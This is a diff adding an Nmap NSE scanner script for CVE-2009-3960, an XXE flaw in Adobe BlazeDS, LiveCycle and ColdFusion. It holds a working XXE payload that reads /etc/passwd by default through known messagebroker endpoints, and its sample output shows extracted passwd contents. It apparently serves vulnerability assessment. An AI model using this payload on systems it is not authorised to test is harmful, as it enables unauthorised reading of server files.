1 files changed, 163 insertions, 0 deletions
diff --git a/scripts/http-vuln-cve2009-3960.nse b/scripts/http-vuln-cve2009-3960.nse
new file mode 100644
index 0000000..38c1e9d
--- /dev/null
+++ b/scripts/http-vuln-cve2009-3960.nse
@@ -0,0 +1,163 @@
+local http = require "http"
+local shortport = require "shortport"
+local stdnse = require "stdnse"
+local string = require "string"
+local table = require "table"
+local vulns = require "vulns"
+
+description = [[
+Exploits cve-2009-3960 also known as Adobe XML External Entity Injection.
+
+This vulnerability permits to read local files remotely and is present in
+BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0,  LiveCycle Data
+Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and
+ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0
+
+For more information see:
+* http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
+* https://www.securityfocus.com/bid/38197
+* Metasploit module: auxiliary/scanner/http/adobe_xml_inject
+]]
+
+---
+-- @see http-adobe-coldfusion-apsa1301.nse
+-- @see http-coldfusion-subzero.nse
+-- @see http-vuln-cve2010-2861.nse
+--
+-- @args http-vuln-cve2009-3960.root Points to the root path. Defaults to "/"
+-- @args http-vuln-cve2009-3960.readfile target file to be read. Defaults to "/etc/passwd"
+--
+-- @usage
+-- nmap --script=http-vuln-cve2009-3960 --script-args http-http-vuln-cve2009-3960.root="/root/" <target>
+--
+--@output
+-- PORT   STATE SERVICE
+-- 80/tcp open  http
+--| http-vuln-cve2009-3960:
+--|     samples/messagebroker/http
+--|     <?xml version="1.0" encoding="utf-8"?>
+--|     <amfx ver="3"><body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string><string>headers</string><string>body</string><string>correlationId</string><string>messageId</string><string>timeToLive</string><string>clientId</string><string>destination</string></traits><double>1.325337665684E12</double><object><traits><string>DSMessagingVersion</string><string>DSId</string></traits><double>1.0</double><string>5E037B49-540B-EDCF-A83A-BE9059CF6812</string></object><null/><string>root:x:0:0:root:/root:/bin/bash
+--|     bin:*:1:1:bin:/bin:/sbin/nologin
+--|     daemon:*:2:2:daemon:/sbin:/sbin/nologin
+--|     adm:*:3:4:adm:/var/adm:/sbin/nologin
+--|     lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
+--|     sync:*:5:0:sync:/sbin:/bin/sync
+--|     shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
+--|     halt:*:7:0:halt:/sbin:/sbin/halt
+--|     mail:*:8:12:mail:/var/spool/mail:/sbin/nologin
+--|     news:*:9:13:news:/etc/news:
+--|     uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin
+--|     operator:*:11:0:operator:/root:/sbin/nologin
+--|     games:*:12:100:games:/usr/games:/sbin/nologin
+--|     gopher:*:13:30:gopher:/var/gopher:/sbin/nologin
+--|     ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin
+--|     nobody:*:99:99:Nobody:/:/sbin/nologin
+--|     nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
+--|     vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin
+--|     pcap:!!:77:77::/var/arpwatch:/sbin/nologin
+--|     mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
+--|     ...
+--|_
+
+author = "Hani Benhabiles"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"exploit", "intrusive", "vuln"}
+
+
+portrule = shortport.http
+
+action = function(host, port)
+  -- Matching returned response body to confirm vulnerability
+  local matchstart = '<?xml version="1.0" encoding="utf-8"?>'
+  local matchend = '</string><null/></object></body></amfx>'
+  local matchsize = 120
+  local matchnotvuln = '<string>External entities are not allowed</string>'
+
+  local results = {}
+  local root = stdnse.get_script_args(SCRIPT_NAME .. ".root") or "/"
+  local readfile = stdnse.get_script_args(SCRIPT_NAME .. ".readfile") or "/etc/passwd"
+
+  local paths = {
+    "messagebroker/http",
+    "messagebroker/httpsecure",
+
+    -- Coldfusion
+    "flex2gateway/http",
+    "flex2gateway/httpsecure",
+
+    -- BlazeDS
+    "blazeds/messagebroker/http",
+    "blazeds/messagebroker/httpsecure",
+    "samples/messagebroker/http",
+    "samples/messagebroker/httpsecure",
+
+    -- LiveCycle Data Services
+    "lcds/messagebroker/http",
+    "lcds/messagebroker/httpsecure",
+    "lcds-samples/messagebroker/http",
+    "lcds-samples/messagebroker/httpsecure",
+  }
+
+  local exploit = [[<?xml version="1.0" encoding="utf-8"?><!DOCTYPE test
+    [ <!ENTITY x3 SYSTEM "]].. readfile
+    .. [["> ]><amfx ver="3"
+    xmlns="http://www.macromedia.com/2005/amfx"><body>
+    <object type="flex.messaging.messages.CommandMessage">
+    <traits><string>body</string><string>clientId</string>
+    <string>correlationId</string><string>destination</string>
+    <string>headers</string><string>messageId</string><string>
+    operation</string><string>timestamp</string><string>timeToLive
+    </string></traits><object><traits /></object><null /><string />
+    <string /><object><traits><string>DSId</string><string>
+    DSMessagingVersion</string></traits><string>nil</string>
+    <int>1</int></object><string>&x3;</string><int>5</int>
+    <int>0</int><int>0</int></object></body></amfx>]]
+
+
+  local options = {header={["Content-Type"]="application/x-amf"}}
+  local path
+
+  local http_vuln = {
+    title = "Adobe XML External Entity Injection",
+    IDS = {CVE = 'CVE-2009-3960'},
+    risk_factor = "High",
+    scores = {
+      CVSSv2 = "4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:N/A:N)",
+    },
+    description = [[
+Permits to read local files remotely and is present in
+BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0,  LiveCycle Data
+Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and
+ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0]],
+    references = {
+      'http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf',
+      'https://www.securityfocus.com/bid/38197'
+    },
+    dates = {
+      disclosure = {year = '2010', month = '02', day = '15'},
+    },
+    exploit_results = {},
+  }
+
+  local report = vulns.Report:new(SCRIPT_NAME, host, port)
+  http_vuln.state = vulns.STATE.NOT_VULN
+
+  for _,path in pairs(paths) do
+    local uri = root .. path
+    local response = http.post(host, port, uri, options, nil, exploit)
+
+    if response.status == 200 then
+      if #response.body >= matchsize and
+        string.sub(response.body,1,string.len(matchstart))==matchstart and
+        string.sub(response.body,-string.len(matchend))==matchend and
+        string.match(response.body, matchnotvuln)==nil
+        then
+          table.insert(results, {'File: ' .. readfile .. ' extracted via ' .. path .. '\n\n',{response.body}})
+          http_vuln.extra_info = stdnse.format_output(true, results)
+          http_vuln.state = vulns.STATE.EXPLOIT
+        end
+    end
+  end
+
+  return report:make_output(http_vuln)
+end